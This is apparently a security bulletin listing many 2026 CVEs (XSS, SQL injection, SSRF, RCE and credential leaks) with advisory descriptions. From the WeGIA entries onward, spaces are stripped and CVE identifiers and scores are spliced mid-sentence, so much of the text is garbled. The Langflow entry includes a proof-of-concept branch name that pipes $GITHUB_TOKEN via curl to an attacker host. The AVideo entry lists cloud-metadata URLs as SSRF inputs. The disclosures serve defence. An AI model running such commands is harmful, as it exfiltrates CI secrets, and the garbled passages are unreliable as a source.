CVE-2026-21732 (base score 9.6): A web page that contains unusual GPU shader code is loaded into the GPU compiler process and can trigger an out-of-bounds write crash in the GPU shader compiler library. On certain platforms, when the compiler process has system privileges this could enable further exploits on the device. An edge case using a very large value in switch statements in GPU shader code can cause a segmentation fault in the GPU shader compiler due to an out-of-bounds write access.

CVE-2026-32890 (base score 9.6): Anchorr is a Discord bot for requesting movies and TV shows and receiving notifications when items are added to a media server. In versions 1.4.1 and below, a stored Cross-site Scripting (XSS) vulnerability in the web dashboard's User Mapping dropdown allows any unprivileged Discord user in the configured guild to execute arbitrary JavaScript in the Anchorr admin's browser. By chaining this with the GET /api/config endpoint (which returns all secrets in plaintext), an attacker can exfiltrate every credential stored in Anchorr, which includes DISCORD_TOKEN, JELLYFIN_API_KEY, JELLYSEERR_API_KEY, JWT_SECRET, WEBHOOK_SECRET, and bcrypt password hashes, without any authentication to Anchorr itself. This issue has been fixed in version 1.4.2.

CVE-2026-30884 (base score 9.6): mdjnelson/moodle-mod_customcert is a Moodle plugin for creating dynamically generated certificates with complete customization via the web browser. Prior to versions 4.4.9 and 5.0.3, a teacher who holds mod/customcert:manage in any single course can read and silently overwrite certificate elements belonging to any other course in the Moodle installation. The core_get_fragment callback editelement and the mod_customcert_save_element web service both fail to verify that the supplied element id belongs to the authorized context, enabling cross-course information disclosure and data tampering. Versions 4.4.9 and 5.0.3 fix the issue.

CVE-2026-29796 (base score 9.4): WebSocket endpoints lack proper authentication mechanisms, enabling attackers to perform unauthorized station impersonation and manipulate data sent to the backend. An unauthenticated attacker can connect to the OCPP WebSocket endpoint using a known or discovered charging station identifier, then issue or receive OCPP commands as a legitimate charger. Given that no authentication is required, this can lead to privilege escalation, unauthorized control of charging infrastructure, and corruption of charging network data reported to the backend.

CVE-2026-2298 (base score 9.4): Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Salesforce Marketing Cloud Engagement allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagement: before January 30th, 2026.

CVE-2026-4404 (base score 9.4): Use of hardcoded credentials in GoHarbor Harbor version 2.15.0 and below allows attackers to use the default password and gain access to the web UI.

CVE-2026-25192 (base score 9.4): WebSocket endpoints lack proper authentication mechanisms, enabling attackers to perform unauthorized station impersonation and manipulate data sent to the backend. An unauthenticated attacker can connect to the OCPP WebSocket endpoint using a known or discovered charging station identifier, then issue or receive OCPP commands as a legitimate charger. Given that no authentication is required, this can lead to privilege escalation, unauthorized control of charging infrastructure, and corruption of charging network data reported to the backend.

CVE-2026-33716 (base score 9.4): WWBN AVideo is an open source video platform. In versions up to and including 26.0, the standalone live stream control endpoint at plugin/Live/standAloneFiles/control.json.php accepts a user-supplied streamerURL parameter that overrides where the server sends token verification requests. An attacker can redirect token verification to a server they control that always returns {"error":false}, completely bypassing authentication. This grants unauthenticated control over any live stream on the platform, including dropping active publishers, starting/stopping recordings, and probing stream existence. Commit 388fcd57dbd16f6cb3ebcdf1d08cf2b929941128 contains a patch.

CVE-2026-27413 (base score 9.3): Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Cozmoslabs Profile Builder Pro allows Blind SQL Injection. This issue affects Profile Builder Pro: from n/a through 3.13.9.

CVE-2026-33134 (base score 9.3): WeGIA is a web manager for charitable institutions. Versions 3.6.5 and below contain an authenticated SQL Injection vulnerability in the html/matPat/restaurarproduto.php endpoint. The vulnerability allows an authenticated attacker to inject arbitrary SQL commands via the idproduto GET parameter, leading to full database compromise. In the script /html/matPat/restaurarproduto.php, the application retrieves the idproduto parameter directly from the $_GET global array and interpolates it directly into two SQL query strings without any sanitization, type-casting (e.g., (int)), or use of parameterized (prepare/execute) statements. This issue has been fixed in version 3.6.6.
WeGIAisawebmanagerforcharitableinstitutions.Versions3.6.6andbelowhaveaReflectedCross-Site Scripting(XSS)vulnerabilityinthenovomemorandoo.phpendpoint.Anattackercaninjectarbitrary JavaScriptintothesccsGETparameter,whichisdirectlyechoedintotheHTMLresponsewithoutanyCVE-2026-sanitizationorencoding.Thescript/html/memorando/novomemorandoo.phpreadsHTTPGETparameters 9.3 MoreDetails33135todisplaydynamicsuccessmessagestotheuser.Atapproximatelyline273,thecodechecksif $GET['msg']equals'success'.Iftrue,itdirectlyconcatenates$_GET['sccs']intoanHTMLalert

and outputsittothebrowser.Thisissuehasbeenfixedinversion3.6.7. SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,SanitizeSVGhasan incompleteblocklist—itblocksdata:text/htmlanddata:image/svg+xmlinhrefattributesbutmisses data:text/xmlanddata:application/xml,bothofwhichcanrenderSVGwithJavaScriptexecution.The unauthenticated/api/icon/getDynamicIconendpointservesuser-controlledinput(viathecontentparameter)CVE-2026- 9.3 MoreDetailsdirectlyintoSVGmarkupusingfmt.Sprintfwithnoescaping,servedasContent-Type:image/svg+xml.This32940 createsaclick-throughXSS:avictimnavigatestoacraftedURL,seesanSVGwithaninjectedlink,and clickingittriggersJavaScriptviathebypassedMIMEtypes.Theattackrequiresdirectnavigationtothe endpointor / embedding,since

tagrenderinginthefrontenddoesn'tallow interactivelinks.Thisissuehasbeenfixedinversion3.6.1. WeGIAisawebmanagerforcharitableinstitutions.Versions3.6.6andbelowhaveaReflectedCross-Site Scripting(XSS)vulnerabilityinthelistarmemorandosativos.phpendpoint.Anattackercaninjectarbitrary JavaScriptorHTMLtagsintothesccdGETparameter,whichisthendirectlyechoedintotheHTMLresponseCVE-2026-withoutanysanitizationorencoding.Thescript/html/memorando/listarmemorandosativos.phphandles 9.333136dynamicsuccessmessagestousersusingquerystringparameters.Similartootherendpointsinthe Memorandomodule,itchecksif$GET['msg']equals'success'.Ifthisconditionismet,itdirectly concatenatesandreflects$GET['sccd']intoanHTMLalert.Thisissueisresolvedinversion3.6.7. FreeScoutisafreehelpdeskandsharedinboxbuiltwithPHP'sLaravelframework.Versions1.8.208and belowarevulnerabletoStoredCross-SiteScripting(XSS)throughFreeScout'semailnotificationtemplates. Incomingemailbodiesarestoredinthedatabasewithoutsanitizationandrenderedunescapedinoutgoing CVE-2026-emailnotificationsusingBlade'srawoutputsyntax{!!$thread->body!!}.Anunauthenticatedattackercan 9.3 MoreDetails32754exploitthisvulnerabilitybysimplysendinganemail,andwhenopenedbyanysubscribedagentoradminas partoftheirnormalworkflow,enablinguniversalHTMLinjection(phishing,tracking)and,invulnerableemail clients,JavaScriptexecution(sessionhijacking,credentialtheft,accounttakeover)affectingallrecipients simultaneously.Thisissuehasbeenfixedinversion1.8.209. 
WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,anunauthenticated server-siderequestforgeryvulnerabilityinplugin/Live/test.phpallowsanyremoteusertomaketheCVE-2026-AVideoserversendHTTPrequeststoarbitraryURLs.Thiscanbeusedtoprobelocalhost/internalservices 9.3 MoreDetails33502and,whenreachable,accessinternalHTTPresourcesorcloudmetadataendpoints.Commit 1e6cf03e93b5a5318204b010ea28440b0d9a5ab3containsapatch. OpenClawbefore2026.3.7containsanimproperheadervalidationvulnerabilityinfetchWithSsrFGuardthat CVE-2026-forwardscustomauthorizationheadersacrosscross-originredirects.Attackerscantriggerredirectsto 9.3 MoreDetails32913differentoriginstointerceptsensitiveheaderslikeX-Api-KeyandPrivate-Tokenintendedfortheoriginal destination. GraphitiisaframeworkthatsitsontopofmodelsandexposesthemviaaJSON:API-compliantinterface. Versionspriorto1.10.2haveanarbitrarymethodexecutionvulnerabilitythataffectsGraphiti'sJSONAPI writefunctionality.AnattackercancraftamaliciousJSONAPIpayloadwitharbitraryrelationshipnamesto invokeanypublicmethodontheunderlyingmodelinstance,classoritsassociations.Anyapplication exposingGraphitiwriteendpoints(create/update/delete)tountrustedusersisaffected.The Graphiti::Util::ValidationResponse#all_valid?methodrecursivelycallsmodel.send(name)usingCVE-2026-relationshipnamestakendirectlyfromuser-suppliedJSONAPIpayloads,withoutvalidatingthemagainstthe33286resource'sconfiguredsideloads.Thisallowsanattackertopotentiallyrunanypublicmethodonagiven modelinstance,ontheinstanceclassorassociatedinstancesorclasses,includingdestructiveoperations. 
ThisispatchedinGraphitiv1.10.2.Usersshouldupgradeassoonaspossible.Someworkaroundsare available.EnsureGraphitiwriteendpoints(create/update)arenotaccessibletountrustedusersand/orapply strongauthenticationandauthorizationchecksbeforeanywriteoperationisprocessed,forexampleuse Railsstrongparameterstoensureonlyvalidparametersareprocessed. TheWPDSGVOTools(GDPR)pluginforWordPressisvulnerabletounauthorizedaccountdestructioninall versionsupto,andincluding,3.1.38.Thisisduetothesuper-unsubscribeAJAXactionacceptinga process_nowparameterfromunauthenticatedusers,whichbypassestheintendedemail-confirmationflow CVE-2026-andimmediatelytriggersirreversibleaccountanonymization.Thismakesitpossibleforunauthenticated 4283attackerstopermanentlydestroyanynon-administratoruseraccount(passwordrandomized, username/emailoverwritten,rolesstripped,commentsanonymized,sensitiveusermetawiped)by submittingthevictim'semailaddresswithprocess_now=1.Thenoncerequiredfortherequestispublicly availableonanypagecontainingthe[unsubscribe_form]shortcode. CVE-2026-Out-of-boundsReadvulnerabilityinfabiangreffrathwoof.Thisissueaffectswoof:beforewoof15.3.0. 9.1 MoreDetails4750 CVE-2026-Out-of-boundsReadvulnerabilityinslajerekRetroDebugger.ThisissueaffectsRetroDebugger:before 4753 9.1v0.64.72. 
LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Anunauthenticatedremote shellinjectionvulnerabilityexistsinmultipleGitHubActionsworkflowsintheLangflowrepositorypriorto version1.9.0.UnsanitizedinterpolationofGitHubcontextvariables(e.g.,`${{github.headref}})inrun:stepsallowsattackerstoinjectandexecutearbitraryshellcommandsviaamaliciousbranchnameorpull requesttitle.Thiscanleadtosecretexfiltration(e.g.,GITHUBTOKEN),infrastructuremanipulation,or supplychaincompromiseduringCI/CDexecution.Version1.9.0patchesthevulnerability.---###Details Severalworkflowsin.github/workflows/and.github/actions/referenceGitHubcontextvariablesdirectly inrun:shellcommands,suchas:``yamlrun:|validatebranchname"${{ github.event.pullrequest.head.ref}}"Or:yamlrun:npxplaywrightinstall${{inputs.browsers}}-- with-depsSince`github.head_ref`,`github.event.pull_request.title`,andcustom`inputs.*`maycontain **user-controlledvalues**,theymustbetreatedas**untrustedinput**.Directinterpolationwithoutproper quotingorsanitizationleadstoshellcommandinjection.---###PoC1.**Fork**theLangflowrepository2.CVE-2026-**Createanewbranch**withthename:bashinjection-test&&curlhttps://attacker.site/exfil?33475token=$GITHUB_TOKEN```3.**OpenaPullRequest**tothemainbranchfromthenewbranch4.GitHub Actionswillruntheaffectedworkflow(e.g.,deploy-docs-draft.yml)5.Therun:stepcontaining:yaml echo"Branch:${{github.head_ref}}"Willexecute:bashecho"Branch:injection-test"curl https://attacker.site/exfil?token=$GITHUB_TOKEN6.TheattackerreceivestheCIsecretviatheexfilURL. 
---###Impact-Type:ShellInjection/RemoteCodeExecutioninCI-Scope:AnypublicLangflow forkwithGitHubActionsenabled-Impact:FullaccesstoCIsecrets(e.g.,GITHUB_TOKEN),possibility topushmalicioustagsorimages,tamperwithreleases,orleaksensitiveinfrastructuredata---### SuggestedFixRefactoraffectedworkflowstouseenvironmentvariablesandwrapthemindouble quotes:yamlenv:BRANCH_NAME:${{github.head_ref}}run:|echo"Branchis:\"$BRANCH_NAME\""Avoiddirect${{...}}interpolationinsiderun:foranyuser-controlledvalue.---###AffectedFiles (Langflow1.3.4)-.github/actions/install-playwright/action.yml-.github/workflows/deploy-docs- draft.yml-.github/workflows/docker-build.yml-.github/workflows/release_nightly.yml- .github/workflows/python_test.yml-.github/workflows/typescript_test.yml LoLLMsWEBUIprovidestheWebuserinterfaceforLordofLargeLanguageandMultimodalSystems.A criticalServer-SideRequestForgery(SSRF)vulnerabilityhasbeenidentifiedinallknownexistingversionsof CVE-2026-lollms-webui.The@router.post("/api/proxy")endpointallowsunauthenticatedattackerstoforcethe 33340serverintomakingarbitraryGETrequests.Thiscanbeexploitedtoaccessinternalservices,scanlocal networks,orexfiltratesensitivecloudmetadata(e.g.,AWS/GCPIAMtokens).Asoftimeofpublication,no knownpatchedversionsareavailable. CVE-2026-Incorrectboundaryconditions,uninitializedmemoryintheJavaScriptEnginecomponent.Thisvulnerability 4716affectsFirefox<149,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. 
CVE-2026-UninitializedmemoryintheGraphics:Canvas2Dcomponent.ThisvulnerabilityaffectsFirefox<149,Firefox 4715 AVideoisavideo-sharingPlatform.Versionspriorto8.0containaServer-SideRequestForgeryvulnerability (CWE-918)inthepublicthumbnailendpointsgetImage.phpandgetImageMP4.php.Bothendpointsaccepta base64UrlGETparameter,base64-decodeit,andpasstheresultingURLtoffmpegasaninputsource withoutanyauthenticationrequirement.ThepriorvalidationonlycheckedthattheURLwassyntacticallyCVE-2026-valid(FILTERVALIDATEURL)andstartedwithhttp(s)://.Thisisinsufficient:anattackercansupplyURLs33024suchashttp://169.254.169.254/latest/meta-data/(AWS/cloudinstancemetadata),http://192.168.x.x/,or http://127.0.0.1/tomaketheserverreachinternalnetworkresources.Theresponseisnotdirectlyreturned (blind),buttimingdifferencesanderrorlogscanbeusedtoinferresults.Theissuehasbeenfixedinversion 8.0. ActiveStorageallowsuserstoattachcloudandlocalfilesinRailsapplications.Priortoversions8.1.2.1, 8.0.4.1,and7.2.3.1,ActiveStorage'sDiskService#delete_prefixedpassesblobkeysdirectlytoDir.globCVE-2026-withoutescapingglobmetacharacters.Ifablobkeycontainsattacker-controlledinputorcustom-generated33202keyswithglobmetacharacters,itmaybepossibletodeleteunintendedfilesfromthestoragedirectory. Versions8.1.2.1,8.0.4.1,and7.2.3.1containapatch. 
Admidioisanopen-sourceusermanagementsolution.Inversions5.0.0through5.0.6,thedocumentsand filesmoduledoesnotverifywhetherthecurrentuserhaspermissiontodeletefoldersorfiles.The folderdeleteandfiledeleteactionhandlersinmodules/documents-files.phponlyperformaVIEW authorizationcheck(getFolderForDownload/getFileForDownload)beforecallingdelete(),andtheyneverCVE-2026-validateaCSRFtoken.BecausethetargetUUIDsarereadfrom$GET,deletioncanbetriggeredbyaplain32817HTTPGETrequest.Whenthemoduleisinpublicmode(documentsfilesmoduleenabled=1)andafolder ismarkedpublic(folpublic=true),anunauthenticatedattackercanpermanentlydestroytheentire documentlibrary.Evenwhenthemodulerequireslogin,anyuserwithview-onlyaccesscandeletecontent theyareonlypermittedtoread.Thisissuehasbeenfixedinversion5.0.7. AvulnerabilityinMLflow'spyfuncextractionprocessallowsforarbitraryfilewritesduetoimproperhandling oftararchiveentries.Specifically,theuseoftarfile.extractallwithoutpathvalidationenablescrafted CVE-2025-tar.gzfilescontaining..orabsolutepathstoescapetheintendedextractiondirectory.Thisissueaffects 15031thelatestversionofMLflowandposesahigh/criticalriskinscenariosinvolvingmulti-tenantenvironmentsor ingestionofuntrustedartifacts,asitcanleadtoarbitraryfileoverwritesandpotentialremotecode execution. 
HTSlibisalibraryforreadingandwritingbioinformaticsfileformats.CRAMisacompressedformatwhich storesDNAsequencealignmentdata.Asonemethodofremovingredundantdata,CRAMusesreference- basedcompressionsothatinsteadofstoringthefullsequenceforeachalignmentrecorditstoresalocation inanexternalreferencesequencealongwithalistofdifferencestothereferenceatthatlocationasa sequenceof"features".WhendecodingCRAMrecords,thereferencedataisstoredinachararray,and CVE-2026-partsmatchingthealignmentrecordsequencearecopiedoverasnecessary.Duetoinsufficientvalidation 31966ofthefeaturedataseries,itwaspossibletomakethe`cramdecode_seq()`functioncopydatafromeither beforethestart,oraftertheendofthestoredreferenceeitherintothebufferusedtostoretheoutput

sequenceforthecramrecord,orintothebufferusedtobuildtheSAMMDtag.Thisallowedarbitrarydata tobeleakedtothecallingfunction.Thisbugmayallowinformationaboutprogramstatetobeleaked.It mayalsocauseaprogramcrashthroughanattempttoaccessinvalidmemory.Versions1.23.1,1.22.2and 1.21.1includefixesforthisissue.Thereisnoworkaroundforthisissue. CVE-2026-UnrestrictedUploadofFilewithDangerousTypevulnerabilityinSyarifMobileAppEditorallowsUploada 27067WebShelltoaWebServer.ThisissueaffectsMobileAppEditor:fromn/athrough1.3.1. OpenEMRisafreeandopensourceelectronichealthrecordsandmedicalpracticemanagementapplication. CVE-2026-Versionspriorto8.0.0.2containaCommandinjectionvulnerabilityinthebackupfunctionalitythatcanbe 32238exploitedbyauthenticatedattackers.Thevulnerabilityexistsduetoinsufficientinputvalidationinthe backupfunctionality.Version8.0.0.2fixestheissue. CensusCSWeb8.0.1allows"app/config"tobereachableviaHTTPinsomedeployments.Aremote,CVE-2025-unauthenticatedattackercouldsendrequeststoconfigurationfilesandobtainleakedsecrets.Fixedin8.1.060949alpha. WhenapplicationsspecifyHTTPresponseheadersforservletapplicationsusingSpringSecurity,thereisthe possibilitythattheHTTPHeaderswillnotbewritten.ThisissueaffectsSpringSecurity:from5.7.0throughCVE-2026- 9.15.7.21,from5.8.0through5.8.23,from6.3.0through6.3.14,from6.4.0through6.4.14,from6.5.0through22732 6.5.8,from7.0.0through7.0.3. 
SuiteCRMisanopen-source,enterprise-readyCustomerRelationshipManagement(CRM)software application.ACriticalRemoteCodeExecution(RCE)vulnerabilityexistsinSuiteCRM7.15.0and8.9.2, allowingauthenticatedadministratorstoexecutearbitrarysystemcommands.Thisvulnerabilityisadirect PatchBypassofCVE-2024-49774.Althoughthevendorattemptedtofixtheissueinversion7.14.5,theCVE-2026-underlyingflawinModuleScanner.phpregardingPHPtokenparsingremains.Thescannerincorrectlyresets29103itsinternalstate($checkFunctionflag)whenencounteringanysingle-charactertoken(suchas=,.,or;). Thisallowsattackerstohidedangerousfunctioncalls(e.g.,system(),exec())usingvariableassignmentsor stringconcatenation,completelyevadingtheMLPsecuritycontrols.Versions7.15.1and8.9.3patchthe issue. Glancesisanopen-sourcesystemcross-platformmonitoringtool.Priortoversion4.5.2,inCentralBrowser mode,the/api/4/serverslistendpointreturnsrawserverobjectsfrom GlancesServersList.get_servers_list().Thoseobjectsaremutatedin-placeduringbackgroundpollingand cancontainaurifieldwithembeddedHTTPBasiccredentialsfordownstreamGlancesservers,usingtheCVE-2026-reusablepbkdf2-derivedGlancesauthenticationsecret.IfthefrontGlancesBrowser/APIinstanceisstarted32633without--password,whichissupportedandcommonforinternalnetworkdeployments,/api/4/serverslist iscompletelyunauthenticated.AnynetworkuserwhocanreachtheBrowserAPIcanretrievereusable credentialsforprotecteddownstreamGlancesserversoncetheyhavebeenpolledbythebrowserinstance.

OpenProjectisanopen-source,web-basedprojectmanagementsoftware.Versionspriorto16.6.9,17.0.6, 17.1.3,and17.2.1arevulnerabletoanSQLinjectionattackviaacustomfield'sname.Whenthatcustom fieldwasusedinaCostReport,thecustomfield'snamewasinjectedintotheSQLquerywithoutproper sanitation.ThisallowedanattackertoexecutearbitrarySQLcommandsduringthegenerationofaCost Report.Ascustomfieldscanonlybegeneratedbyuserswithfulladministratorprivileges,theattacksurface CVE-2026-issomewhatreduced.TogetherwithanotherbugintheRepositories_module,thatusedtheprojectidentifier 32698withoutsanitationtogeneratethecheckoutpathforagitrepositoryinthefilesystem,thisallowedan attackertocheckoutagitrepositorytoanarbitrarilychosenpathontheserver.Ifthecheckoutisdone withincertainpathswithintheOpenProjectapplication,uponthenextrestartoftheapplication,thisallows theattackertoinjectrubycodeintotheapplication.Astheprojectidentifiercannotbemanuallyeditedto anystringcontainingspecialcharacterslikedotsorslashes,thisneedstobechangedviatheSQLinjection describedabove.Versions16.6.9,17.0.6,17.1.3,and17.2.1fixtheissue. CVE-2026-TheWiFiExtenderWDR201A(HWV2.1,FWLFMZX28040922V1.02)exposesanunprotectedUARTinterface 30704throughaccessiblehardwarepadsonthePCB ThewebinterfaceoftheWiFiExtenderWDR201A(HWV2.1,FWLFMZX28040922V1.02)containshardcoded CVE-2026-credentialdisclosuremechanisms(intheformofServerSideInclude)withinmultipleserver-sidewebpages, 30701includinglogin.shtmlandsettings.shtml.Thesepagesembedserver-sideexecutiondirectivesthat dynamicallyretrieveandexposethewebadministrationpasswordfromnon-volatilememoryatruntime. 
gRPC-GoistheGolanguageimplementationofgRPC.Versionspriorto1.79.3haveanauthorizationbypass resultingfromimproperinputvalidationoftheHTTP/2:pathpseudo-header.ThegRPC-Goserverwastoo lenientinitsroutinglogic,acceptingrequestswherethe:pathomittedthemandatoryleadingslash(e.g., Service/Methodinsteadof/Service/Method).Whiletheserversuccessfullyroutedtheserequeststothe correcthandler,authorizationinterceptors(includingtheofficialgrpc/authzpackage)evaluatedtheraw, non-canonicalpathstring.Consequently,"deny"rulesdefinedusingcanonicalpaths(startingwith/)failed tomatchtheincomingrequest,allowingittobypassthepolicyifafallback"allow"rulewaspresent.This affectsgRPC-Goserversthatusepath-basedauthorizationinterceptors,suchastheofficialRBAC CVE-2026-implementationingoogle.golang.org/grpc/authzorcustominterceptorsrelyingoninfo.FullMethodor 33186grpc.Method(ctx);ANDthathaveasecuritypolicycontainsspecific"deny"rulesforcanonicalpathsbut allowsotherrequestsbydefault(afallback"allow"rule).Thevulnerabilityisexploitablebyanattackerwho

cansendrawHTTP/2frameswithmalformed:pathheadersdirectlytothegRPCserver.Thefixinversion 1.79.3ensuresthatanyrequestwitha:paththatdoesnotstartwithaleadingslashisimmediately rejectedwithacodes.Unimplementederror,preventingitfromreachingauthorizationinterceptorsor handlerswithanon-canonicalpathstring.Whileupgradingisthemostsecureandrecommendedpath, userscanmitigatethevulnerabilityusingoneofthefollowingmethods:Useavalidatinginterceptor (recommendedmitigation);infrastructure-levelnormalization;and/orpolicyhardening. ServiceinformationisnotencryptedwhentransmittedasBACnetpacketsoverthewire,andcanbesniffed, CVE-2026-intercepted,andmodifiedbyanattacker.ValuableinformationsuchastheFileStartPositionandFileData 24060canbesniffedfromnetworktrafficusingWireshark'sBACnetdissectorfilter.Theproprietaryformatusedby WebCTRLtoreceiveupdatesfromthePLCcanalsobesniffedandreverseengineered. Versionsofthepackagejsrsasignfrom7.0.0andbefore11.1.1arevulnerabletoIncompleteComparison CVE-2026-withMissingFactorsviathegetRandomBigIntegerZeroToMaxandgetRandomBigIntegerMinToMaxfunctions 4599insrc/crypto-1.1.js;anattackercanrecovertheprivatekeybyexploitingtheincorrectcompareTochecks thatacceptout-of-rangecandidatesandthusbiasDSAnoncesduringsignaturegeneration. 
WWBNAVideoisanopensourcevideoplatform.Priortoversion26.0,thesetPassword.json.phpendpoint intheCustomizeUserpluginallowsadministratorstosetachannelpasswordforanyuser.Duetoalogic CVE-2026-errorinhowthesubmittedpasswordvalueisprocessed,anypasswordcontainingnon-numericcharactersis 33297silentlycoercedtotheintegerzerobeforebeingstored.Thismeansthatregardlessoftheintended password,thestoredchannelpasswordbecomes0,whichanyvisitorcantriviallyguesstobypasschannel- levelaccesscontrol.Version26.0containsapatchfortheissue. WWBNAVideoisanopensourcevideoplatform.Priortoversion26.0,aServer-SideRequestForgery(SSRF) vulnerabilityexistsinplugin/Live/standAloneFiles/saveDVR.json.php.WhentheAVideoLivepluginis CVE-2026-deployedinstandalonemode(theintendedconfigurationforthisfile),the$_REQUEST['webSiteRootURL'] 33351parameterisuseddirectlytoconstructaURLthatisfetchedserver-sideviafile_get_contents().No authentication,originvalidation,orURLallowlistingisperformed.Version26.0containsapatchforthe issue. 
HTSlibisalibraryforreadingandwritingbioinformaticsfileformats.CRAMisacompressedformatwhich storesDNAsequencealignmentdata.Inthecram_decode_slice()functioncalledwhilereadingCRAM records,thevalueofthematereferenceidfieldwasnotvalidated.Lateruseofthisvalue,forexamplewhen convertingthedatatoSAMformat,couldresultintheoutofboundsarrayreadswhenlookinguptheCVE-2026-correspondingreferencename.Ifthearrayvalueobtainedalsohappenedtobeavalidpointer,itwouldbe31967interpretedasastringandanattemptwouldbemadetowritethedataaspartoftheSAMrecord.Thisbug mayallowinformationaboutprogramstatetobeleaked.Itmayalsocauseaprogramcrashthroughan attempttoaccessinvalidmemory.Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisno workaroundforthisissue. SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,themobilefiletree (MobileFiles.ts)rendersnotebooknamesviainnerHTMLwithoutHTMLescapingwhenprocessing renamenotebookWebSocketevents.Thedesktopversion(Files.ts)properlyusesescapeHtml()forthesame operation.AnauthenticateduserwhocanrenamenotebookscaninjectarbitraryHTML/JavaScriptthatCVE-2026- 9.0executesonanymobileclientviewingthefiletree.SinceElectronisconfiguredwithnodeIntegration:true32751 andcontextIsolation:false,theinjectedJavaScripthasfullNode.jsaccess,escalatingstoredXSStofull remotecodeexecution.ThemobilelayoutisalsousedintheElectrondesktopappwhenthewindowis narrow,makingthisexploitableondesktopaswell.Thisissuehasbeenfixedinversion3.6.1.

OpenProjectisanopen-source,web-basedprojectmanagementsoftware.Inversionspriorto16.6.9,17.0.6, 17.1.3,and17.2.1,theRepositoriesmoduledidnotproperlyescapefilenamesdisplayedfromrepositories. CVE-2026-Thisallowedanattackerwithpushaccessintotherepositorytocreatecommitswithfilenamesthatincluded 9.0 MoreDetails32703HTMLcodethatwasinjectedinthepagewithoutpropersanitation.ThisallowedapersistedXSSattack againstallmembersofthisprojectthataccessedtherepositoriespagetodisplayachangesetwherethe maliciouslycraftedfilewasdeleted.Versions16.6.9,17.0.6,17.1.3,and17.2.1fixtheissue. UnrestrictedUploadofFilewithDangerousTypevulnerabilityinRymeraWebCoPtyLtd.WoocommerceCVE-2026-WholesaleLeadCaptureallowsUsingMaliciousFiles.ThisissueaffectsWoocommerceWholesaleLead 9.0 MoreDetails27540Capture:fromn/athrough2.0.3.1. AnchorrisaDiscordbotforrequestingmoviesandTVshowsandreceivingnotificationswhenitemsare addedtoamediaserver.Versions1.4.1andbelowcontainastoredXSSvulnerabilityintheJellyseerruser selector.JellyseerrallowsanyaccountholdertoexecutearbitraryJavaScriptintheAnchorradmin'sbrowser session.Theinjectedscriptcallstheauthenticated/api/configendpoint-whichreturnsthefullapplicationCVE-2026-configurationinplaintext.ThisallowstheattackertoforgeavalidAnchorrsessiontokenandgainfulladmin 9.0 MoreDetails32891accesstothedashboardwithnoknowledgeoftheadminpassword.Thesameresponsealsoexposesthe APIkeysandtokensforeveryintegratedservice,resultinginsimultaneousaccounttakeoveroftheJellyfin mediaserver(viaJELLYFINAPIKEY),theJellyseerrrequestmanager(viaJELLYSEERRAPIKEY),andthe Discordbot(viaDISCORD_TOKEN).Thisissuehasbeenfixedinversion1.4.2. 
SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,thebackend renderREADMEfunctionuseslute.New()withoutcallingSetSanitize(true),allowingrawHTMLembeddedin

Markdowntopassthroughunmodified.ThefrontendthenassignstherenderedHTMLtoinnerHTMLwithoutCVE-2026- 9.0 MoreDetails 33066anyadditionalsanitization.AmaliciouspackageauthorcanembedarbitraryJavaScriptintheirREADMEthat executeswhenauserclickstoviewthepackagedetails.BecauseSiYuan'sElectronconfigurationenables nodeIntegration:truewithcontextIsolation:false,thisXSSescalatesdirectlytofullRemoteCodeExecution. Theissuewaspatchedinversion3.6.1. SiYuanisapersonalknowledgemanagementsystem.Versions3.6.0andbelowrenderpackagemetadata fields(displayName,description)usingtemplateliteralswithoutHTMLescaping.Amaliciouspackageauthor caninjectarbitraryHTML/JavaScriptintothesefields,whichexecutesautomaticallywhenanyuserbrowsesCVE-2026-theBazaarpage.BecauseSiYuan'sElectronconfigurationenablesnodeIntegration:truewith 9.0 MoreDetails33067contextIsolation:false,thisXSSescalatesdirectlytofullRemoteCodeExecutiononthevictim'soperating system—withzerouserinteractionbeyondopeningthemarketplacetab.Thisissuehasbeenfixedin version3.6.1. NVIDIAAPEXforLinuxcontainsavulnerabilitywhereanunauthorizedattackercouldcauseadeserialization CVE-2025-ofuntrusteddata.ThisvulnerabilityaffectsenvironmentsthatusePyTorchversionsearlierthan2.6.A 9.0 MoreDetails33244successfulexploitofthisvulnerabilitymightleadtocodeexecution,denialofservice,escalationof privileges,datatampering,andinformationdisclosure.

OTHERVULNERABILITIES

CVE Number | Base Score | Description

CVE- AvulnerabilitywasdeterminedinUTTHiPER1200GWupto2.5.3-170306.Thisimpactsthefunctionstrcpyofthe More2026- file/goform/websHostFilter.Thismanipulationcausesbufferoverflow.Itispossibletoinitiatetheattackremotely. 8.8 Details4487 Theexploithasbeenpubliclydisclosedandmaybeutilized. CVE- OutofboundsreadandwriteinWebAudioinGoogleChromepriorto146.0.7680.153allowedaremoteattacker More2026- 8.8 topotentiallyexploitheapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4459 Asecurityissuewasdiscoverediningress-nginxwhereacombinationofIngressannotationscanbeusedtoinjectCVE- configurationintonginx.Thiscanleadtoarbitrarycodeexecutioninthecontextoftheingress-nginxcontroller, More2026- 8.8 anddisclosureofSecretsaccessibletothecontroller.(Notethatinthedefaultinstallation,thecontrollercan Details4342 accessallSecretscluster-wide.) CVE- TypeConfusioninV8inGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentiallyexploit More2026- 8.8 heapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4457 CVE- VitalsESPdevelopedbyGalaxySoftwareServiceshasaIncorrectAuthorizationvulnerability,allowing More2026- 8.8 authenticatedremoteattackerstoperformcertainadministrativefunctions,therebyescalatingprivileges. 
